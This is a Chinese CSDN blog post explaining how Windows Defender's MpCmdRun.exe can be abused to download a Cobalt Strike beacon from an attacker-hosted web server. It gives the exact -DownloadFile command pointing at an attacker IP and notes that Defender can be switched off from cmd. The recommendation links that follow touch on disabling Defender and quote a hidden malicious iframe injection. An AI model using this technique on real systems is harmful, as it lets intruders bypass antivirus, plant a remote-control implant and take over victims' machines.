MpCmdRun恶意文件下载

最新推荐文章于 2024-01-25 17:16:38 发布
最新推荐文章于 2024-01-25 17:16:38 发布
阅读量2.6k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/108866696
版权

文章前言

Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~

具体实现

Step 1:在cobaltstrike中生成恶意攻击载荷

Step 2:在攻击主机中搭建web服务托管beacon.exe程序

Step 3:在目标主机上使用Windows Defender自带的MpCmdRun.exe程序下载恶意文件

"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://192.168.188.129:6666/beacon.exe -path c:\\users\\resnd\\Desktop\\c-beacon.exe

Step 4:之后执行恶意文件,可以看到在CS中成功上线

 

 

 

 

 

FLy_鹏程万里
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
又一个下载恶意文件的政府网站
Purpleendurer@CSDN
08-22 3296
endurer 原创2006-08-22 第1版 首页有3处地方被加入:/--------<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>--------/hxxp://***object.cnic**b.com/15   的内容为插入许多空格的JavaScript脚本,利用 Microso
恶意代码分析实战 课后练习实验文件
09-07
恶意代码分析实战 课后练习配套完整文件。
pikachu之不安全的文件下载概述
qq_42728977的博客
12-26 1020
不安全的文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。 此时如果 攻击者提交的不...
两个会自动下载恶意程序文件的政府网站
Purpleendurer@CSDN
08-18 4178
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
pikachu靶场-7 不安全的文件下载和上传
weixin_52180702的博客
12-13 1021
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能会导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件。文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。
文件下载_新WhiteShadow下载器用Microsoft SQL提取恶意软件
weixin_39844901的博客
11-04 92
攻击活动分析2019年8月,Proofpoint研究人员发现了一系列的传播含有WhiteShadow下载器VB宏的word和Excel附件的恶意邮件活动。图1: AWhiteShadow攻击活动中的恶意邮件WhiteShadow是一种恶意软件交付服务,其中包含Microsoft SQL Server实例来保存下载器提取的主机payload。下面是攻击活动的概览:表 1: WhiteSh...
MpCmdRun.log
01-02
MpCmdRun
Windows 10 Defender误删除了我的文件,用这个方法,轻松恢复
01-05
Windows 10 Defender误删除文件恢复方法 Windows 10 操作系统附带内置的防病毒保护,称为 Windows Defender。如果安全程序配置为检测并修复设备上的威胁,则 Windows Defender Antivirus 将隔离可疑文件。但是,...
多功能超强批处理(杀毒 优化 系统操作)
09-03
例如,Windows Defender可以通过`MpCmdRun.exe`执行命令行操作,如`MpCmdRun.exe -Scan -ScanType 3`来进行全盘扫描。 2. **系统优化**:优化可能包括清理临时文件、注册表清理、启动项管理等。批处理可以使用`Del`...
给Win10系统右键菜单添加Windows Defender扫描选项的方法.docx
09-27
7. 点击选中Command项,在右侧窗口,双击"默认"字符串值,在编辑数值数据窗口,将数值数据设置为"C:\Program Files\Windows Defender\MpCmdRun.exe -scan -scantype 3 -SignatureUpdate -file %1"。 完成注册表修改...
恶意代码分类
07-26
该资料很好的讲解了恶意代码的特征提取以及分类办法。
通过命令下载执行恶意代码的几种姿势
热门推荐
08-20 2万+
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。在目标主机执行恶意代码,可以分为上传/下载并执行恶意代...
恶意代码分析实战Lab1
weixin_47038938的博客
01-25 4792
Lab1-1恶意代码分析实战恶意代码样本下载Lab1-1二、使用步骤1.引入库2.读入数据总结 恶意代码分析实战 Michael Sikorski Andrew Honig 著 诸葛建伟 姜辉 张光凯 译 恶意代码样本下载 前言-先决条件-恶意代码样本下载链接: https://practicalmalwareanalysis.com/ 1.点击Labs 2.点击Download NOTE: We provide a self-extracting archive and an encrypted
Windows Defender的一些渗透知识
Ms08067安全实验室
02-23 970
前言Microsoft Defender,最初称为Microsoft AntiSpyware,是微软推出的一款杀毒软件。相信大家对Windows Defender 的防御性能还是没有怀疑的,毕竟最了解Windows系统的还得是微软自己。但是这货也比较令人头疼,毕竟它检测到问题直接就杀了,然后弹窗告诉用户“我已经拦截了一个XXX”。完全属于先斩后奏。今天正好看到大佬的文章,跟着学习一下Windows...
win10 家庭版安装软件报错:无法成功安装操作,因为文件包含病毒或潜在的垃圾软件
junjiahuang的博客
09-15 3113
安装软件时,系统提示:无法成功安装操作,因为文件包含病毒或潜在的垃圾软件。
Windows Defender渗透扫盲
st3pby的博客
06-20 1014
查看排除项#查看版本#查看篡改保护(返回结果中的 数值5代表开启,数值4代表关闭)​​#需要TrustedInstaller权限##cmd注册表关闭Windows defender​##cmd关闭篡改保护​##cmd注册表恢复Windows defender​##cmd添加Windows defender排除项配置和管理 Microsoft Defender 防病毒软件的命令行工具。
使用Windowsdefender自定义扫描工具(以win10系统为例)
最新发布
zhizhi120的博客
01-25 811
go使用wind10的Windowsdefender自定义扫描工具对文件进行检测
永久禁用Windows Defender代码方案(可恢复)【支持Windows10、Windows11】
夜栩的博客
06-07 2227
选择【疑难解答】-【高级选项】-【启动设置】-【重启】,然后按4键进入安全模式。选择【疑难解答】-【高级选项】-【启动设置】-【重启】,然后按4键进入安全模式。(输入非YES的其它任意字符回车是恢复Windows Defender)以管理员身份打开PowerShell,复制代码回车后,输入YES回车。以管理员身份打开PowerShell,复制代码回车后,输入NO回车。cmd运行命令:shutdown -f -r -o -t 0。cmd运行命令:shutdown -f -r -o -t 0。
直接扫描到win10系统的计算机,win10下如何摆脱“Windows Defender需要扫描您的计算机”通知...
weixin_42500631的博客
07-26 1058
win10下如何摆脱“Windows Defender需要扫描您的计算机”通知Windows Defender是Windows 10的内置防病毒软件。该实用程序扫描作为Win 10自动维护的一部分。但是,“Windows Defender需要扫描您的计算机”操作中心通知仍然可以为某些用户定期弹出。因此,一些用户可能想知道他们可以做些什么来确保Windows Defender通知不会继续弹出。这是用...
C#调用杀毒软件MSE扫描指定目录或文件
06-02
你可以使用 Microsoft Security Essentials (MSE) 提供的命令行工具 MpCmdRun.exe 来实现 C# 调用 MSE 扫描指定目录或文件。 以下是示例代码: ```csharp using System.Diagnostics; public void ScanFileOrDirectory(string path) { // 构造扫描命令 string command = $"/Scan {path}"; // 调用 MpCmdRun.exe 执行扫描命令 ProcessStartInfo processInfo = new ProcessStartInfo("MpCmdRun.exe", command); processInfo.CreateNoWindow = true; processInfo.UseShellExecute = false; Process process = Process.Start(processInfo); process.WaitForExit(); // 处理扫描结果 if (process.ExitCode == 0) { Console.WriteLine("扫描完成,未发现病毒。"); } else if (process.ExitCode == 1) { Console.WriteLine("扫描完成,发现病毒。"); } else { Console.WriteLine("扫描出错。"); } } ``` 注意,为了能够调用 MpCmdRun.exe,你需要将其所在目录添加到系统环境变量中。另外,为了保证安全,你应该避免使用硬编码的路径,并对用户的输入进行严格的验证和过滤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值